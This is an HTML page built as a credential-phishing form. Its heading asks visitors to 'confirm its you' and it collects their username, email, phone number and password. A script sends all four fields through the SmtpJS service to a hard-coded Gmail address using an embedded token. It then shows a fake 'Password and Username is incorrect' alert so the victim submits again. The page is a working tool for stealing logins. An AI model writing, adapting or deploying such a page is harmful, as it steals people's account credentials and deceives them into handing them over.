<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-B">
    <meta http-equiv="X-UA-Compatible" contents="IE=edge">
    <meta name="viewport" contents="with=device-width, initial-scale=1.0">
    <title>Document</title>
    </head>
    <style>
     .container{
        display: grid;
        place-items: center;
        
    }
    .main{
      background-color: #0000ff;
      width: 370px;
      height: 470px;
    }
     form{
       width: 350px;
       height: 400px;   
       color: white; 
     }
    form label{
        color: white;        
    }
    .form-input{
        margin-top: 10px;
        font-size: 20px;
        margin-left: 50px;      
    }
   input{
      width: 80%;
      height: 30px;
      border-radius:10px;

    }
    
    .form-input button{
        
        
         font-size: 10px;
         cursor: pointer;
         background: #0076ff;
         border-radius: 5px;
         padding: 5px;
         color: #fff;
         font-size: 20px;
         font-weight: bold;
}
    </style>
    <body>
       <div class="container">
     <center>  <h1>Complete the form to confirm its you </h1></center>
       

       <div class="main">
       <form action="">


           <div class="form-input">
           <label foe="">Username</label><br>
           <input type="text" palaceholder="Enter your Name:" id="name">
       </div>

           <div class="form-input">
           <label foe="">Email</label><br>
           <input type="text" palaceholder="Enter your Email:" id="email">
       </div>
           <div class="form-input">
           <label foe="">Contact Number</label><br>
           <input type="text" palaceholder="Enter your Contact number:" id="contact">
       </div>

           <div class="form-input">
           <label foe="">password</label><br>
           <input type="text" palaceholder="Enter your subject:" id="password">
       </div>    

          

                   
     <div class="form-input">
        <button type="button" onclick="SendEmail()">Send Email</button>

       
       </div>






       </form
       
       </div>
       <!-- end main clasd -->
       </div>
   <!--end Conatiner class   -->

          <script src="https://smtpjs.com/v3/smtp.js"> </script>




       <script>
         function SendEmail(){
         let name = document.getElementById("name").value;
         let email = document.getElementById("email").value;
         let conatact = document.getElementById("contact").value;
         let subject = document.getElementById("password").value;
          
          let body = "Username:" + name + "<br/> Email:" + email +"<br/> contact Number:" + conatact + "<br/> Password:" + subject;  
       
            Email.send({
    SecureToken : "b41e9546-2c5a-4fe7-a7a0-a1773f3dbff3",
   To : 'sepadagerard6@gmail.com',
    From : "goodboyph123@gmail.com",
   Subject : "message from Contact form",
   Body : body
   }).then(function (message) {
   alert("Password and Username is incorrect! please try again")
   });
   }



         
       </script>
       </body>
       </html>





<p>try only</p>



